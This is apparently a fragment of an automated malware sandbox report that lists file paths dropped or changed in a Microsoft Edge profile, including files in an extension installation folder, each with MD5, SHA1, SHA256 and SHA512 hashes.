| SHA1 | 227cd9d0347d6f0f19462e4291c9c945e06cb441 |
| SHA256 | eccb095eb043b1ab896876d293615d086e5fd7c0bbe553791b63761610a154a1 |
| SHA512 | 28f38aff66b5e3e2b1cb363cbbac4fa46b55c82b09c9e32f763b8c9bfcaf512da602df83e68bba427cd3143b54c0f17afd470e5dbc95a043f4ac391b9d639f9e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir1364_1765062675\CRX_INSTALL\manifest.json
| MD5 | 5bc0831300dcd8c02dbbe8adb7ef6b5f |
| SHA1 | ac06188a096d3b35e041e0e2f48fc2a4fbfbd369 |
| SHA256 | fe0e84f33aaa7549a85309c2ae52c14e7170c6d0de78dcf4f5f5035d5c78a699 |
| SHA512 | 6d0fc1057850874d8b685415ee96ab62ab32617590ff58bbdba96ca5373f0ed56ed8fbef07987dc6678d4ef406ed13a8de12326aa52536370cab508bbb25fbb9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir1364_1765062675\CRX_INSTALL\document.js
| MD5 | 3b67cd7dd1b8c86a56e557db6431575f |
| SHA1 | 3029b95766c302a48d72a0c585d63380a24d2ec2 |
| SHA256 | 486a44bf682a3ce4d25d89051dbd4c7af95cbc5d1fb4ec4aef0c7cf606efe2af |
| SHA512 | ecb76d5ff543c37499365b8dddf3558e32486f5cc300fa057bf7ec280b169bad60663c679648d26d9d1b8f13bf1ce3d85cb919434f0a09b9e9704cbfb34b75e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir1364_1765062675\CRX_INSTALL\debug.js
| MD5 | 2d114b6c8f72048ab789b63ea5ce81bc |
| SHA1 | 8494ac32138a4d666bef650c608565567c2bb8a6 |
| SHA256 | 6f636c81bfd121cbfad707499276c6ed3f8f20cc2af22adadfb59a8b56bbf410 |
| SHA512 | 60ae7267c6605c287ab3aeb79c98427f9a3d6d017529aacb27dc7c68a8f6bccc62507759d0d9a6ae4773d277c8d9d1a819adea7badf279eb4671d8cf15055732 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir1364_1765062675\CRX_INSTALL\captured.html
| MD5 | f35b53a857b516423ef2411e797fd966 |
| SHA1 | 3b2261a6c72ab5325b8b6dc644154c0bb9cffcec |
| SHA256 | 2c387e39ab78ab8f283d623a16b946285cda96daf1ea86e20bc4baad68cfc49f |
| SHA512 | 10b0a8bfc957f6be3c3e54b3672938c7ec00dabe098ff751d4b36424dc76a2dcf1ccc02fc281e6d7d308376ad1288642125c8374cfff9511bc140b687c5dca55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir1364_1765062675\CRX_INSTALL\background.js
| MD5 | f4632c71080d62c1a5e8012f4e0d6c8e |
| SHA1 | 50d464721c585a0c7c47667ca2b2e53752588ba0 |
| SHA256 | d52c121b9f04df1fdbfb39e5f76197d1c76c280e8f49ce8b0bbde6e27485b4b4 |
| SHA512 | d50e244f242ff662cb3a496d15d1c08851958d059077a49f9a9a989a2629fbf47f236a3f905bf85068c674507935379acc0b4544569e1a30959388de1b911bda |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b8891d36f907ea26b1f868877f3317d6 |
| SHA1 | 616b67d5b4d1692a12ebca611770f9bf5ad6fad7 |
| SHA256 | 1e412dbf085d5bc0b2966be24661b5e24832f8f851e355faba89904ef9fc0fee |
| SHA512 | d589c8c2c45aef1b1bf9dd9dc7325f30270a621e36401030be831f20424fc3a36c1e168e4f7092148ae09038db9b214592e93452206829ba809544423e3ba5c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 9b3afa37928b6f32aa1c19dcd2765ab8 |
| SHA1 | 37f55b412b03c7d1d2f821f05ee1eb14a202ad5d |
| SHA256 | bb7d73eb659ad65818b4578514b666f73f8de939feaf8cdd59b8a2ecc4c1e94f |
| SHA512 | ebb58854d7e827117812cb6ec82fdeae70072073a8342d0742bd55bdddfc5b57fbab30085d3873d9d57045009fd5d6980524ea84e388081ef9a301d0c083372e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0960deddadc4e0f52a02eeed1a790eea |
| SHA1 | aaa8d022bd9be8e4d4353e093af774a40390062c |
| SHA256 | 119e0c9f0882b28180bc438a5a5d6291703ddf47dda82853fbeb85fc84d96413 |
| SHA512 | 3d82c261045c7a2959123e797350473bed2eb7dc364813c78512b15fa8f154c8865f0bbb44ed9731a77d14a063cd477e22e4e7336d4e91688b88a597f81f934f |
memory/5988-1992-0x0000000000400000-0x000000000042B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 668c10be6c5199aa68ba04bdf1be414d |
| SHA1 | 09dde1e9bf98ddee21ce95b83a8b13966ab21139 |
| SHA256 | 11f8ef395cd597b44daad0094401c30cfda44eb39c5211bf8a211112e315690a |
| SHA512 | 5da9604d64f2d25779bf3c44e19cf9417cb1bc8a62f8159e8d10a95ff7faba08eef6424230d9838fc3e76a58030973f746a43ea628062472c63ff0c64a9524f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | c5bb5016990278b9e4dcd10d5f12e1f9 |
| SHA1 | ba162497846bf6984ff07ee7e6dd56086f6ac082 |
| SHA256 | 1b247d9fed63e043d2b9c328e644c97f7933530f53506a2401fd96b314fc0102 |
| SHA512 | cd878751c8668edd5cac0f33ac37d0a731f7446b9acadc396c228b37011db0dc32556589f15e623d4b10d21ca4349ad9bbb7de12d4a309a31dd816de3b6ac0e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1b306cf9bfe5d20e647f8a8ee6a2cf47 |
| SHA1 | a52b551b121e1aa8f1ad3d61246029c0494633b0 |
| SHA256 | 09125b856672c8b0ad9d4c11181a4109b929910e06003d9202480e5a66477452 |
| SHA512 | 53e7e3547592fd31d3bf370b98147c77d949fbfabe9d7b841ae3e7c067ff1b4f33f00fb47c08c5e64ab67920c5a6f37ca441456dab0b55c8e7202217dd4f0632 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 25e0aad13d3a48d02e4eb8a684cad5a8 |
| SHA1 | 834c38b125b7aae6e673b05e13020d865b6e7199 |
| SHA256 | 4af4a0cd6aa1044873863332596799cc9343c2bacc19b53e2794436697673a13 |
| SHA512 | e33caabfc3376f75babbf3eba3813786beefffef29a5dfccf0a7e30411886f818b6a9fe7822ff596ab1dbb6e5d965f8e7f7c433f93ff5bd03e4ff544f3ca520e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 10b22b2e58bdfc3e5b064f91ed65cddf |
| SHA1 | e6e4ba471e750b28b93d364437daf62e32be62c9 |
| SHA256 | f85c092ebfa94bd2b47414212eb3d51336f231ce4e0938758db22480bbce2a45 |
| SHA512 | 9006603fbed3d86d1fd7e6ab9331c26c67e087ea317a85cbcb39de10fe83483c35745026270cba98943a61f7d1db354d9630921821bfed2da83460f491eb10c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4893613d8912e4fc931b07f3ff0d7088 |
| SHA1 | 12a3324c519ccbfafdc60f46bdf455982b7a3480 |
| SHA256 | 8a4ecabf04d1f85524edd7c11d29a9cef8c01c6c12b340744a53f5217df69b57 |
| SHA512 | e364dd7b8bc5e00fd254f34c93aab99de2d782441037edc29a5c0377862455db0f2c4c5bf828c61dd84f1b827cd6a0a76113286e19423a935724a1bcbbaaa2bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | d671ea89d9123488893c794ddd747309 |
| SHA1 | 01e23961b595841fa3bde9daef94b8dd1e3d6bbc |
| SHA256 | 3a6863a5d6ed43c1cd0b1d6dcdd7b503ee2ad0af9ae9826f3ba6e2f287110a99 |
| SHA512 | 0e25faa6d87d0211596c553921f200de45a1a41a9ab2d8e7e200e15df224da1460e5bdd71a6d19d38975ae4d5a4ec172f3eb48610ca8e61165a218784d7383bc |